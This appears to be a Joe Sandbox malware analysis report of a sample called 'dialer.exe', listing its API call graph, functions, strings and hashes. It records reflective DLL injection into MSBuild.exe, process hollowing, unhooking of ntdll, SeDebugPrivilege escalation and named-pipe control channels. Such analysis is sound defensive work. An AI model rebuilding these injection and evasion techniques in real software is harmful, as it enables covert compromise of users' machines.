                                                    execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                    Callgraph

                                                    Executed Functions

                                                    Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                    • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                    • API String ID: 4177739653-1130149537
                                                    • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                    • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                    • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                    • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                    Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                    • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                    • API String ID: 2561231171-3753927220
                                                    • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                    • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                    • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                    • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                    Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                    • String ID:
                                                    • API String ID: 4084875642-0
                                                    • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                    • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                    • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                    • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                    Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                    • String ID:
                                                    • API String ID: 3197395349-0
                                                    • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                    • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                    • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                    • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                    Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                    • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                      • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                      • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                      • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                      • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                      • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                      • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                      • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                      • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                      • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                    • OpenProcess.KERNEL32 ref: 0000000140001859
                                                    • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                    • CloseHandle.KERNEL32 ref: 0000000140001875
                                                    • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                    • String ID:
                                                    • API String ID: 1323846700-0
                                                    • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                    • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                    • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                    • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                    Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                    • String ID: .text$C:\Windows\System32\
                                                    • API String ID: 2721474350-832442975
                                                    • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                    • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                    • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                    • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                    Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                    • String ID: M$\\.\pipe\dialerchildproc64
                                                    • API String ID: 2203880229-3489460547
                                                    • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                    • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                    • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                    • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                    Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                    • String ID: \\.\pipe\dialercontrol_redirect64
                                                    • API String ID: 2071455217-3440882674
                                                    • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                    • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                    • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                    • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                    Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                    • String ID:
                                                    • API String ID: 3676546796-0
                                                    • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                    • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                    • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                    • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                    Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseHandleOpenWow64
                                                    • String ID:
                                                    • API String ID: 10462204-0
                                                    • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                    • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                    • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                    • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                    Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                    APIs
                                                      • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
